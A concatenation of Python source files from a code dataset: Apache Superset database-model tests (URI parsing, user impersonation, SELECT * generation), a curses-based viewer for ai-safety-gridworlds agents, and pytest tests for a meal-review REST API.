sqlalchemy_uri = "hive://hive@hive.airbnb.io:10000/default?auth=NOSASL"
model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
db = make_url(model.get_sqla_engine().url).database
self.assertEqual("default", db)
db = make_url(model.get_sqla_engine(schema="core_db").url).database
self.assertEqual("core_db", db)
@unittest.skipUnless(
SupersetTestCase.is_module_installed("MySQLdb"), "mysqlclient not installed"
)
def test_database_schema_mysql(self):
sqlalchemy_uri = "mysql://root@localhost/superset"
model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
db = make_url(model.get_sqla_engine().url).database
self.assertEqual("superset", db)
db = make_url(model.get_sqla_engine(schema="staging").url).database
self.assertEqual("staging", db)
@unittest.skipUnless(
SupersetTestCase.is_module_installed("MySQLdb"), "mysqlclient not installed"
)
def test_database_impersonate_user(self):
uri = "mysql://root@localhost"
example_user = security_manager.find_user(username="gamma")
model = Database(database_name="test_database", sqlalchemy_uri=uri)
with override_user(example_user):
model.impersonate_user = True
username = make_url(model.get_sqla_engine().url).username
self.assertEqual(example_user.username, username)
model.impersonate_user = False
username = make_url(model.get_sqla_engine().url).username
self.assertNotEqual(example_user.username, username)
@mock.patch("superset.models.core.create_engine")
def test_impersonate_user_presto(self, mocked_create_engine):
uri = "presto://localhost"
principal_user = security_manager.find_user(username="gamma")
extra = """
{
"metadata_params": {},
"engine_params": {
"connect_args":{
"protocol": "https",
"username":"original_user",
"password":"original_user_password"
}
},
"metadata_cache_timeout": {},
"schemas_allowed_for_file_upload": []
}
"""
with override_user(principal_user):
model = Database(
database_name="test_database", sqlalchemy_uri=uri, extra=extra
)
model.impersonate_user = True
model.get_sqla_engine()
call_args = mocked_create_engine.call_args
assert str(call_args[0][0]) == "presto://gamma@localhost"
assert call_args[1]["connect_args"] == {
"protocol": "https",
"username": "original_user",
"password": "original_user_password",
"principal_username": "gamma",
}
model.impersonate_user = False
model.get_sqla_engine()
call_args = mocked_create_engine.call_args
assert str(call_args[0][0]) == "presto://localhost"
assert call_args[1]["connect_args"] == {
"protocol": "https",
"username": "original_user",
"password": "original_user_password",
}
@mock.patch("superset.models.core.create_engine")
def test_impersonate_user_trino(self, mocked_create_engine):
principal_user = security_manager.find_user(username="gamma")
with override_user(principal_user):
model = Database(
database_name="test_database", sqlalchemy_uri="trino://localhost"
)
model.impersonate_user = True
model.get_sqla_engine()
call_args = mocked_create_engine.call_args
assert str(call_args[0][0]) == "trino://localhost"
assert call_args[1]["connect_args"] == {"user": "gamma"}
model = Database(
database_name="test_database",
sqlalchemy_uri="trino://original_user:original_user_password@localhost",
)
model.impersonate_user = True
model.get_sqla_engine()
call_args = mocked_create_engine.call_args
assert str(call_args[0][0]) == "trino://original_user@localhost"
assert call_args[1]["connect_args"] == {"user": "gamma"}
@mock.patch("superset.models.core.create_engine")
def test_impersonate_user_hive(self, mocked_create_engine):
uri = "hive://localhost"
principal_user = security_manager.find_user(username="gamma")
extra = """
{
"metadata_params": {},
"engine_params": {
"connect_args":{
"protocol": "https",
"username":"original_user",
"password":"original_user_password"
}
},
"metadata_cache_timeout": {},
"schemas_allowed_for_file_upload": []
}
"""
with override_user(principal_user):
model = Database(
database_name="test_database", sqlalchemy_uri=uri, extra=extra
)
model.impersonate_user = True
model.get_sqla_engine()
call_args = mocked_create_engine.call_args
assert str(call_args[0][0]) == "hive://localhost"
assert call_args[1]["connect_args"] == {
"protocol": "https",
"username": "original_user",
"password": "original_user_password",
"configuration": {"hive.server2.proxy.user": "gamma"},
}
model.impersonate_user = False
model.get_sqla_engine()
call_args = mocked_create_engine.call_args
assert str(call_args[0][0]) == "hive://localhost"
assert call_args[1]["connect_args"] == {
"protocol": "https",
"username": "original_user",
"password": "original_user_password",
}
@pytest.mark.usefixtures("load_energy_table_with_slice")
def test_select_star(self):
db = get_example_database()
table_name = "energy_usage"
sql = db.select_star(table_name, show_cols=False, latest_partition=False)
quote = db.inspector.engine.dialect.identifier_preparer.quote_identifier
expected = (
textwrap.dedent(
f"""\
SELECT *
FROM {quote(table_name)}
LIMIT 100"""
)
if db.backend in {"presto", "hive"}
else textwrap.dedent(
f"""\
SELECT *
FROM {table_name}
LIMIT 100"""
)
)
assert expected in sql
sql = db.select_star(table_name, show_cols=True, latest_partition=False)
# TODO(bkyryliuk): unify sql generation
if db.backend == "presto":
assert (
textwrap.dedent(
"""\
SELECT "source" AS "source",
"target" AS "target",
"value" AS "value"
FROM "energy_usage"
LIMIT 100"""
)
== sql
)
elif db.backend == "hive":
assert (
textwrap.dedent(
"""\
SELECT `source`,
`target`,
`value`
FROM `energy_usage`
LIMIT 100"""
)
== sql
)
else:
assert (
textwrap.dedent(
"""\
SELECT source,
target,
value
FROM energy_usage
LIMIT 100"""
)
in sql
)
def test_select_star_fully_qualified_names(self):
db = get_example_database()
schema = "schema.name"
table_name = "table/name"
sql = db.select_star(
table_name, schema=schema, show_cols=False, latest_partition=False
)
fully_qualified_names = {
"sqlite": '"schema.name"."table/name"',
"mysql": "`schema.name`.`table/name`",
"postgres": '"schema.name"."table/name"',
}
fully_qualified_name = fully_qualified_names.get(db.db_engine_spec.engine)
if fully_qualified_name:
expected = textwrap.dedent(
f"""\
SELECT *
FROM {fully_qualified_name}
LIMIT 100"""
)
assert sql.startswith(expected)
def test_single_statement(self):
main_db = get_example_database()
if main_db.backend == "mysql":
df = main_db.get_df("SELECT 1", None)
self.assertEqual(df.iat[0, 0], 1)
df = main_db.get_df("SELECT 1;", None)
self.assertEqual(df.iat[0, 0], 1)
def test_multi_statement(self):
main_db = get_example_database()
if main_db.backend == "mysql":
df = main_db.get_df("USE superset; SELECT 1", None)
self.assertEqual(df.iat[0, 0], 1)
df = main_db.get_df("USE superset; SELECT ';';", None)
self.assertEqual(df.iat[0, 0], ";")
@mock.patch("superset.models.core.create_engine")
def test_get_sqla_engine(self, mocked_create_engine):
model = Database(
database_name="test_database",
sqlalchemy_uri="mysql://root@localhost",
)
model.db_engine_spec.get_dbapi_exception_mapping = mock.Mock(
return_value={Exception: SupersetException}
)
mocked_create_engine.side_effect = Exception()
with self.assertRaises(SupersetException):
model.get_sqla_engine()
class TestSqlaTableModel(SupersetTestCase):
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_get_timestamp_expression(self):
tbl = self.get_table(name="birth_names")
ds_col = tbl.get_column("ds")
sqla_literal = ds_col.get_timestamp_expression(None)
assert str(sqla_literal.compile()) == "ds"
sqla_literal = ds_col.get_timestamp_expression("P1D")
compiled = "{}".format(sqla_literal.compile())
if tbl.database.backend == "mysql":
assert compiled == "DATE(ds)"
prev_ds_expr = ds_col.expression
ds_col.expression = "DATE_ADD(ds, 1)"
sqla_literal = ds_col.get_timestamp_expression("P1D")
compiled = "{}".format(sqla_literal.compile())
if tbl.database.backend == "mysql":
assert compiled == "DATE(DATE_ADD(ds, 1))"
ds_col.expression = prev_ds_expr
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_get_timestamp_expression_epoch(self):
tbl = self.get_table(name="birth_names")
ds_col = tbl.get_column("ds")
ds_col.expression = None
ds_col.python_date_format = "epoch_s"
sqla_literal = ds_col.get_timestamp_expression(None)
compiled = "{}".format(sqla_literal.compile())
if tbl.database.backend == "mysql":
self.assertEqual(compiled, "from_unixtime(ds)")
ds_col.python_date_format = "epoch_s"
sqla_literal = ds_col.get_timestamp_expression("P1D")
compiled = "{}".format(sqla_literal.compile())
if tbl.database.backend == "mysql":
self.assertEqual(compiled, "DATE(from_unixtime(ds))")
prev_ds_expr = ds_col.expression
ds_col.expression = "DATE_ADD(ds, 1)"
sqla_literal = ds_col.get_timestamp_expression("P1D")
compiled = "{}".format(sqla_literal.compile())
if tbl.database.backend == "mysql":
self.assertEqual(compiled, "DATE(from_unixtime(DATE_ADD(ds, 1)))")
ds_col.expression = prev_ds_expr
def query_with_expr_helper(self, is_timeseries, inner_join=True):
tbl = self.get_table(name="birth_names")
ds_col = tbl.get_column("ds")
ds_col.expression = None
ds_col.python_date_format = None
spec = self.get_database_by_id(tbl.database_id).db_engine_spec
if not spec.allows_joins and inner_join:
# if the db does not support inner joins, we cannot force it so
return None
old_inner_join = spec.allows_joins
spec.allows_joins = inner_join
arbitrary_gby = "state || gender || '_test'"
arbitrary_metric = dict(
label="arbitrary", expressionType="SQL", sqlExpression="SUM(num_boys)"
)
query_obj = dict(
groupby=[arbitrary_gby, "name"],
metrics=[arbitrary_metric],
filter=[],
is_timeseries=is_timeseries,
columns=[],
granularity="ds",
from_dttm=None,
to_dttm=None,
extras=dict(time_grain_sqla="P1Y"),
series_limit=15 if inner_join and is_timeseries else None,
)
qr = tbl.query(query_obj)
self.assertEqual(qr.status, QueryStatus.SUCCESS)
sql = qr.query
self.assertIn(arbitrary_gby, sql)
self.assertIn("name", sql)
if inner_join and is_timeseries:
self.assertIn("JOIN", sql.upper())
else:
self.assertNotIn("JOIN", sql.upper())
spec.allows_joins = old_inner_join
self.assertFalse(qr.df.empty)
return qr.df
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_query_with_expr_groupby_timeseries(self):
if get_example_database().backend == "presto":
# TODO(bkyryliuk): make it work for presto.
return
def cannonicalize_df(df):
ret = df.sort_values(by=list(df.columns.values), inplace=False)
ret.reset_index(inplace=True, drop=True)
return ret
df1 = self.query_with_expr_helper(is_timeseries=True, inner_join=True)
name_list1 = cannonicalize_df(df1).name.values.tolist()
df2 = self.query_with_expr_helper(is_timeseries=True, inner_join=False)
name_list2 = cannonicalize_df(df1).name.values.tolist()
self.assertFalse(df2.empty)
assert name_list2 == name_list1
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_query_with_expr_groupby(self):
self.query_with_expr_helper(is_timeseries=False)
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_sql_mutator(self):
tbl = self.get_table(name="birth_names")
query_obj = dict(
groupby=[],
metrics=None,
filter=[],
is_timeseries=False,
columns=["name"],
granularity=None,
from_dttm=None,
to_dttm=None,
extras={},
)
sql = tbl.get_query_str(query_obj)
self.assertNotIn("-- COMMENT", sql)
def mutator(*args, **kwargs):
return "-- COMMENT\n" + args[0]
app.config["SQL_QUERY_MUTATOR"] = mutator
sql = tbl.get_query_str(query_obj)
self.assertIn("-- COMMENT", sql)
app.config["SQL_QUERY_MUTATOR"] = None
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_sql_mutator_different_params(self):
tbl = self.get_table(name="birth_names")
query_obj = dict(
groupby=[],
metrics=None,
filter=[],
is_timeseries=False,
columns=["name"],
granularity=None,
from_dttm=None,
to_dttm=None,
extras={},
)
sql = tbl.get_query_str(query_obj)
self.assertNotIn("-- COMMENT", sql)
def mutator(sql, database=None, **kwargs):
return "-- COMMENT\n--" + "\n" + str(database) + "\n" + sql
app.config["SQL_QUERY_MUTATOR"] = mutator
mutated_sql = tbl.get_query_str(query_obj)
self.assertIn("-- COMMENT", mutated_sql)
self.assertIn(tbl.database.name, mutated_sql)
app.config["SQL_QUERY_MUTATOR"] = None
def test_query_with_non_existent_metrics(self):
tbl = self.get_table(name="birth_names")
query_obj = dict(
groupby=[],
metrics=["invalid"],
filter=[],
is_timeseries=False,
columns=["name"],
granularity=None,
from_dttm=None,
to_dttm=None,
extras={},
)
with self.assertRaises(Exception) as context:
tbl.get_query_str(query_obj)
self.assertTrue("Metric 'invalid' does not exist", context.exception)
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_data_for_slices_with_no_query_context(self):
tbl = self.get_table(name="birth_names")
slc = (
metadata_db.session.query(Slice)
.filter_by(
datasource_id=tbl.id,
datasource_type=tbl.type,
slice_name="Genders",
)
.first()
)
data_for_slices = tbl.data_for_slices([slc])
assert len(data_for_slices["metrics"]) == 1
assert len(data_for_slices["columns"]) == 1
assert data_for_slices["metrics"][0]["metric_name"] == "sum__num"
assert data_for_slices["columns"][0]["column_name"] == "gender"
assert set(data_for_slices["verbose_map"].keys()) == {
"__timestamp",
"sum__num",
"gender",
}
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_data_for_slices_with_query_context(self):
tbl = self.get_table(name="birth_names")
slc = (
metadata_db.session.query(Slice)
.filter_by(
datasource_id=tbl.id,
datasource_type=tbl.type,
slice_name="Pivot Table v2",
)
.first()
)
data_for_slices = tbl.data_for_slices([slc])
assert len(data_for_slices["metrics"]) == 1
assert len(data_for_slices["columns"]) == 2
assert data_for_slices["metrics"][0]["metric_name"] == "sum__num"
assert data_for_slices["columns"][0]["column_name"] == "name"
assert set(data_for_slices["verbose_map"].keys()) == {
"__timestamp",
"sum__num",
"name",
"state",
}
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_data_for_slices_with_adhoc_column(self):
# should perform sqla.model.BaseDatasource.data_for_slices() with adhoc
# column and legacy chart
tbl = self.get_table(name="birth_names")
dashboard = self.get_dash_by_slug("births")
slc = Slice(
slice_name="slice with adhoc column",
datasource_type="table",
viz_type="table",
params=json.dumps(
{
"adhoc_filters": [],
"granularity_sqla": "ds",
"groupby": [
"name",
{"label": "adhoc_column", "sqlExpression": "name"},
],
"metrics": ["sum__num"],
"time_range": "No filter",
"viz_type": "table",
}
),
datasource_id=tbl.id,
)
dashboard.slices.append(slc)
datasource_info = slc.datasource.data_for_slices([slc])
assert "database" in datasource_info
# clean up and auto commit
metadata_db.session.delete(slc)
| 37.273016 | 88 | 0.59454 |
ace75df61e00595f857242a75a043e029c4f0558 | 8,722 | py | Python | ai_safety_gridworlds_viewer/view_agent.py | n0p2/ai-safety-gridworlds-viewer | 96f6421212797817f17b1e723b1849e9d3fba7b9 | [
"Apache-2.0"
] | null | null | null | ai_safety_gridworlds_viewer/view_agent.py | n0p2/ai-safety-gridworlds-viewer | 96f6421212797817f17b1e723b1849e9d3fba7b9 | [
"Apache-2.0"
] | null | null | null | ai_safety_gridworlds_viewer/view_agent.py | n0p2/ai-safety-gridworlds-viewer | 96f6421212797817f17b1e723b1849e9d3fba7b9 | [
"Apache-2.0"
] | null | null | null | import logging
import collections
import six
import curses
import datetime
import time
class AgentViewer(object):
"""A terminal-based game viewer for ai-safety-gridworlds games.
(https://github.com/deepmind/ai-safety-gridworlds)
This is based on the `human_ui.CursesUi` class from the pycolab game
engine (https://github.com/deepmind/pycolab) developped by Deepmind.
Both `CursesUi` and its subclass `safety_ui.SafetyCursesUi` allow a
human player to play their games with keyboard input.
`AgentViewer` is created to enable display of a live game as an agent
plays it. This is desirable in reinforcement learning (RL) settings,
where one need to view an agent's interactions with the environment
as the game progresses.
As far as programming paradigm goes, I try to find a balance
between OO (object oriented) and FP (functional programming).
Classes are defined to manage resources and mutable states.
All other resuable logic are defined as functions (without side
effect) outside of the class.
"""
def __init__(self, pause, **kwargs):
"""Construct an `AgentViewer`, which displays agent's interactions
with the environment in a terminal for ai-safety-gridworlds games
developed by Google Deepmind.
Args:
pause: float.
A game played by an agent often proceed at a pace too fast
for meaningful watching. `pause` allows one to adjust the
displaying pace. Note that when displaying an elapsed time
on the game window, the wall clock time consumed by pausing
is subtracted (see `_get_elapsed`).
"""
self._screen = curses.initscr()
self._colour_pair = init_curses(self._screen, **kwargs)
self._pause = pause
self.reset_time()
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, *a):
self.close()
def close(self):
curses.endwin()
def display(self, env):
"""
Args:
env: ai_safety_gridworlds.environments.shared.safety_game.SafetyEnvironment.
An instance of SafetyEnvironment which contains observations (or boards)
and returns.
"""
board = env.current_game._board.board
return_ = env.episode_return
# Time cost is not always a good indicator for performance evaluation.
# Other indicators, such as number of episodes, might be more suitable.
# Neverthelesss, only elapsed time is displayed, while support of
# additional information should be done by the consumer of AgentViewer.
elapsed = self._get_elapsed()
try:
display(self._screen, board, return_, elapsed, self._colour_pair)
self._do_pause()
if self._pause is not None:
time.sleep(self._pause)
except:
curses.endwin()
def reset_time(self):
self._start_time = time.time()
self._pause_cnt = 0
def _do_pause(self):
if self._pause is not None:
time.sleep(self._pause)
self._pause_cnt += 1
def _get_elapsed(self):
now = time.time()
s = 0.0 if self._pause is None else self._pause
elapsed = now - self._start_time - float(s) * self._pause_cnt
return elapsed
#--------
# Core functions that deal with screen initialization and display.
# These functions are heavily based on the `human_ui.CursesUi` class
# (https://github.com/deepmind/pycolab/blob/master/pycolab/human_ui.py)
#--------
def display(screen, board, score, elapsed, color_pair):
"""Redraw the game board onto the already-running screen, with elapsed time and score.
Args:
screen
obs: TODO class. A `???` object containing the current game board.
score:
elapsed: seconds
"""
#screen.erase()
screen.clear()
# Display the game clock and the current score.
screen.addstr(0, 2, ts2str(elapsed), curses.color_pair(0))
screen.addstr(0, 10, 'Score: %.2f' % score, curses.color_pair(0))
# Display game board rows one-by-one.
for row, board_line in enumerate(board, start=1):
screen.move(row, 0) # Move to start of this board row.
# Display game board characters one-by-one.
for character in board_line:
character = int(character)
color_id = color_pair[chr(character)]
color_ch = curses.color_pair(color_id)
screen.addch(character, color_ch)
screen.refresh()
def init_colour(color_bg, color_fg):
"""
Based on `human_ui.CursesUi._init_colour`
(https://github.com/deepmind/pycolab/blob/master/pycolab/human_ui.py)
"""
curses.start_color()
# The default colour for all characters without colours listed is boring
# white on black, or "system default", or somesuch.
colour_pair = collections.defaultdict(lambda: 0)
# And if the terminal doesn't support true color, that's all you get.
if not curses.can_change_color():
return colour_pair
# Collect all unique foreground and background colours. If this terminal
# doesn't have enough colours for all of the colours the user has supplied,
# plus the two default colours, plus the largest colour id (which we seem
# not to be able to assign, at least not with xterm-256color) stick with
# boring old white on black.
colours = set(six.itervalues(color_fg)).union(six.itervalues(color_bg))
if (curses.COLORS - 2) < len(colours):
return colour_pair
# Get all unique characters that have a foreground and/or background colour.
# If this terminal doesn't have enough colour pairs for all characters plus
# the default colour pair, stick with boring old white on black.
characters = set(color_fg).union(color_bg)
if (curses.COLOR_PAIRS - 1) < len(characters):
return colour_pair
# Get the identifiers for both colours in the default colour pair.
cpair_0_fg_id, cpair_0_bg_id = curses.pair_content(0)
# With all this, make a mapping from colours to the IDs we'll use for them.
ids = (set(range(curses.COLORS - 1)) - # The largest ID is not assignable?
{cpair_0_fg_id, cpair_0_bg_id}) # We don't want to change these.
ids = list(reversed(sorted(ids))) # We use colour IDs from large to small.
ids = ids[:len(colours)] # But only those colour IDs we actually need.
colour_ids = dict(zip(colours, ids))
# Program these colours into curses.
for colour, cid in six.iteritems(colour_ids):
curses.init_color(cid, *colour)
# Now add the default colours to the colour-to-ID map.
cpair_0_fg = curses.color_content(cpair_0_fg_id)
cpair_0_bg = curses.color_content(cpair_0_bg_id)
colour_ids[cpair_0_fg] = cpair_0_fg_id
colour_ids[cpair_0_bg] = cpair_0_bg_id
# The color pair IDs we'll use for all characters count up from 1; note that
# the "default" colour pair of 0 is already defined, since _colour_pair is a
# defaultdict.
colour_pair.update(
{character: pid for pid, character in enumerate(characters, start=1)})
# Program these color pairs into curses, and that's all there is to do.
for character, pid in six.iteritems(colour_pair):
# Get foreground and background colours for this character. Note how in
# the absence of a specified background colour, the same colour as the
# foreground is used.
cpair_fg = color_fg.get(character, cpair_0_fg_id)
cpair_bg = color_bg.get(character, cpair_fg)
# Get colour IDs for those colours and initialise a colour pair.
cpair_fg_id = colour_ids[cpair_fg]
cpair_bg_id = colour_ids[cpair_bg]
curses.init_pair(pid, cpair_fg_id, cpair_bg_id)
return colour_pair
def char2ord_4_colormap(colour):
if colour is not None:
return {ord(char): colour for char, colour in six.iteritems(colour)}
else:
return None
def init_curses(screen, color_bg, color_fg, delay=None):
logger = get_logger()
logger.info('init_curses...')
# If the terminal supports colour, program the colours into curses as
# "colour pairs". Update our dict mapping characters to colour pairs.
colour_pair = init_colour(color_bg, color_fg)
curses.curs_set(0) # We don't need to see the cursor.
if delay is None:
screen.timeout(-1) # Blocking reads
else:
screen.timeout(delay) # Nonblocking (if 0) or timing-out reads
logger.info('init_curses success.')
return colour_pair
def ts2str(ts_delta):
delta = datetime.timedelta(seconds=ts_delta)
return str(delta).split('.')[0]
#--------
# logging and debugging
#--------
_logger = None
def get_logger():
"""
singleton
"""
global _logger
if _logger is None:
_logger = logging.getLogger(__file__)
hdlr = logging.FileHandler(__file__ + ".log")
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
_logger.addHandler(hdlr)
_logger.setLevel(logging.DEBUG)
return _logger
| 35.028112 | 89 | 0.710961 |
ace75e147168fff8d365bb41cfdff7a76ff403f4 | 12,120 | py | Python | tests/api/test_reviews.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | 1 | 2018-11-03T17:48:50.000Z | 2018-11-03T17:48:50.000Z | tests/api/test_reviews.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | 3 | 2021-03-09T09:47:04.000Z | 2022-02-12T13:04:41.000Z | tests/api/test_reviews.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | null | null | null | # -*- encoding: utf-8 -*-
"""Test the views at /api/v1/reviews."""
import uuid
import pytest
from ceraon.models.reviews import Review
from tests.utils import BaseViewTest
@pytest.mark.usefixtures('db')
class TestFindReview(BaseViewTest):
"""Test GET /api/v1/reviews/ID."""
base_url = '/api/v1/reviews/{}'
def test_nonexistent_get(self, testapp):
"""Test the a nonexistent get returns a 404."""
res = testapp.get(self.base_url.format(uuid.uuid4()), status=404)
assert res.status_code == 404
assert 'error_code' in res.json
assert 'error_message' in res.json
def test_successful_get(self, testapp, review):
"""Test that a normal GET works just fine."""
res = testapp.get(self.base_url.format(review.id))
assert res.status_code == 200
data = res.json['data']
assert 'reviewer' in data
assert 'description' in data
assert 'rating' in data
assert 'meal' in data
@pytest.mark.usefixtures('db')
class TestCreateReview(BaseViewTest):
"""Test POST /api/v1/reviews."""
endpoints = [
'/api/v1/reviews?meal_id={}',
'/api/v1/meals/{}/reviews'
]
def setup_method(self, method):
"""Set up the test class. Pytest will call this for us."""
self.valid_data = {
'description': 'this is my description',
'rating': 4.0,
}
@pytest.mark.parametrize('endpoint', endpoints)
def test_unauthenticated_create(self, testapp, past_meal, endpoint):
"""Test that we get a 401 if the user is not authenticated."""
url = endpoint.format(past_meal.id)
res = testapp.post_json(url, self.valid_data, status=401)
assert res.status_code == 401
@pytest.mark.parametrize('endpoint', endpoints)
def test_meal_not_joined(self, testapp, endpoint, user, past_meal):
"""Test that we get a 403 if we didn't join the meal."""
self.login(user, testapp)
url = endpoint.format(past_meal.id)
res = testapp.post_json(url, self.valid_data, status=403)
assert res.status_code == 403
assert 'error_code' in res.json
assert 'error_message' in res.json
@pytest.mark.parametrize('endpoint', endpoints)
def test_meal_in_future(self, testapp, endpoint, user, meal):
"""Test that we get a 428 if the meal hasn't happened yet."""
self.login(user, testapp)
url = endpoint.format(meal.id)
res = testapp.post_json(url, self.valid_data, status=428)
assert res.status_code == 428
assert 'error_code' in res.json
assert 'error_message' in res.json
@pytest.mark.parametrize('endpoint', endpoints)
def test_guest_can_review(self, testapp, endpoint, past_guest, past_meal):
"""Test that a guest can review the meal just fine."""
self.login(past_guest, testapp)
url = endpoint.format(past_meal.id)
res = testapp.post_json(url, self.valid_data)
assert res.status_code == 201
assert 'data' in res.json
assert 'message' in res.json
data = res.json['data']
assert 'reviewer' in data
assert 'description' in data
assert 'rating' in data
assert 'meal' in data
@pytest.mark.parametrize('endpoint', endpoints)
def test_review_needs_description(self, testapp, endpoint, past_guest,
past_meal):
"""Test that a review needs a description."""
del self.valid_data['description']
self.login(past_guest, testapp)
url = endpoint.format(past_meal.id)
res = testapp.post_json(url, self.valid_data, status=422)
assert 'description' in res.json['error_message']
@pytest.mark.parametrize('endpoint', endpoints)
def test_review_needs_rating(self, testapp, endpoint, past_guest,
past_meal):
"""Test that a review needs a rating."""
del self.valid_data['rating']
self.login(past_guest, testapp)
url = endpoint.format(past_meal.id)
res = testapp.post_json(url, self.valid_data, status=422)
assert 'rating' in res.json['error_message']
@pytest.mark.parametrize('endpoint', endpoints)
def test_reivew_rating_positive(self, testapp, endpoint, past_guest,
past_meal):
"""Test that a review needs a positive rating."""
self.valid_data['rating'] = -1.5
self.login(past_guest, testapp)
url = endpoint.format(past_meal.id)
res = testapp.post_json(url, self.valid_data, status=422)
assert 'rating' in res.json['error_message']
@pytest.mark.parametrize('endpoint', endpoints)
def test_reivew_rating_interval(self, testapp, endpoint, past_guest,
past_meal):
"""Test that a review needs a rating divisible by 0.5."""
self.valid_data['rating'] = 1.7
self.login(past_guest, testapp)
url = endpoint.format(past_meal.id)
res = testapp.post_json(url, self.valid_data, status=422)
assert 'rating' in res.json['error_message']
@pytest.mark.usefixtures('db')
class TestUpdateReview(BaseViewTest):
"""Test PATCH /api/v1/reviews/UUID."""
base_url = '/api/v1/reviews/{}'
def setup_method(self, method):
"""Set up the test class. Pytest will call this for us."""
self.valid_data = {
'description': 'this is my description',
'rating': 4.0,
}
def test_unauthenticated(self, testapp, review):
"""Test that unauthenticated gets a 401."""
res = testapp.patch_json(self.base_url.format(review.id),
self.valid_data, status=401)
assert res.status_code == 401
def test_no_review_found(self, testapp, guest):
"""Test that a nonexistent review gets a 404."""
self.login(guest, testapp)
res = testapp.patch_json(self.base_url.format(uuid.uuid4()),
self.valid_data, status=404)
assert res.status_code == 404
def test_unauthorized(self, testapp, host, review):
"""Test that unauthorized gets a 403."""
self.login(host, testapp)
res = testapp.patch_json(self.base_url.format(review.id),
self.valid_data, status=403)
assert res.status_code == 403
def test_update_works(self, testapp, past_guest, review):
"""Test that updating a review works."""
self.login(past_guest, testapp)
res = testapp.patch_json(self.base_url.format(review.id),
self.valid_data)
assert res.status_code == 200
assert review.rating == self.valid_data['rating']
def test_partial_update_works(self, testapp, past_guest, review):
"""Test that only partially updating a review works."""
self.login(past_guest, testapp)
res = testapp.patch_json(self.base_url.format(review.id),
{'rating': 4.00})
assert res.status_code == 200
assert review.rating == 4.00
@pytest.mark.usefixtures('db')
class TestReplaceReview(BaseViewTest):
"""Test PUT /api/v1/reviews/UUID."""
base_url = '/api/v1/reviews/{}'
def setup_method(self, method):
"""Set up the test class. Pytest will call this for us."""
self.valid_data = {
'description': 'this is my description',
'rating': 4.0,
}
def test_unauthenticated(self, testapp, review):
"""Test that unauthenticated gets a 401."""
res = testapp.put_json(self.base_url.format(review.id),
self.valid_data, status=401)
assert res.status_code == 401
def test_no_review_found(self, testapp, guest):
"""Test that a nonexistent review gets a 404."""
self.login(guest, testapp)
res = testapp.put_json(self.base_url.format(uuid.uuid4()),
self.valid_data, status=404)
assert res.status_code == 404
def test_unauthorized(self, testapp, review, host):
"""Test that unauthorized gets a 403."""
self.login(host, testapp)
res = testapp.put_json(self.base_url.format(review.id),
self.valid_data, status=403)
assert res.status_code == 403
def test_replace_works(self, testapp, past_guest, review):
"""Test that replacing a review works."""
self.login(past_guest, testapp)
res = testapp.put_json(self.base_url.format(review.id),
self.valid_data)
assert res.status_code == 200
assert review.rating == self.valid_data['rating']
def test_partial_replace_fails(self, testapp, past_guest, review):
"""Test that only partially replacing a review fails."""
self.login(past_guest, testapp)
res = testapp.put_json(self.base_url.format(review.id),
{'rating': 4.00}, status=422)
assert res.status_code == 422
assert 'description' in res.json['error_message']
@pytest.mark.usefixtures('db')
class TestDestroyReview(BaseViewTest):
"""Test DELETE /api/v1/reviews/UUID."""
base_url = '/api/v1/reviews/{}'
def test_unauthenticated(self, testapp, review):
"""Test that unauthenticated gets a 401."""
res = testapp.delete(self.base_url.format(review.id), status=401)
assert res.status_code == 401
def test_review_not_found(self, testapp, user):
"""Test that a review not found gets a 404."""
self.login(user, testapp)
res = testapp.delete(self.base_url.format(uuid.uuid4()), status=404)
assert res.status_code == 404
def test_not_reviewer(self, testapp, host, review):
"""Test that not being the reviewer gets a 403."""
self.login(host, testapp)
res = testapp.delete(self.base_url.format(review.id), status=403)
assert res.status_code == 403
def test_review_deleted(self, testapp, past_guest, review):
"""Test that a reviewer can delete a meal."""
self.login(past_guest, testapp)
res = testapp.delete(self.base_url.format(review.id))
assert res.status_code == 204
try_find_review = Review.find(review.id)
assert try_find_review is None
@pytest.mark.usefixtures('db')
class TestGetMyReviews(BaseViewTest):
"""Test GET /api/v1/reviews/mine/<role>."""
base_url = '/api/v1/reviews/mine/{}'
def test_unauthenticated(self, testapp, review):
"""Test that an unauthenticated user gets a 401."""
res = testapp.get(self.base_url.format('guest'), status=401)
assert res.status_code == 401
def test_see_reviewed_meals(self, testapp, past_guest, review):
"""Test that a user can see the reviews they wrote."""
self.login(past_guest, testapp)
res = testapp.get(self.base_url.format('guest'))
assert res.status_code == 200
assert res.json['data'][0]['id'] == str(review.id)
assert len(res.json['data']) == 1
def test_see_hosted_reviews(self, testapp, host, review):
"""Test that a user can see the reviews for meals they host."""
self.login(host, testapp)
res = testapp.get(self.base_url.format('host'))
assert res.status_code == 200
assert res.json['data'][0]['id'] == str(review.id)
assert len(res.json['data']) == 1
def test_see_hosts_reviewed_meals(self, testapp, host, review):
"""Check that the host has reviewed no meals... just a sanity check."""
self.login(host, testapp)
res = testapp.get(self.base_url.format('guest'))
assert res.status_code == 200
assert len(res.json['data']) == 0
def test_bad_role(self, testapp, user):
"""Test that you can only specify 'guest' or 'host' as a role."""
self.login(user, testapp)
res = testapp.get(self.base_url.format('somethingelse'), status=400)
assert res.status_code == 400
| 39.096774 | 79 | 0.624587 |
ace75e7cc5703dbfcd44e18fde66fe9a4c404143 | 1,404 | py | Python | cv/urls.py | OOXXXXOO/XCloud | 021342eec570f12d82ae750a645dc1cb99cfb733 | [
"MIT"
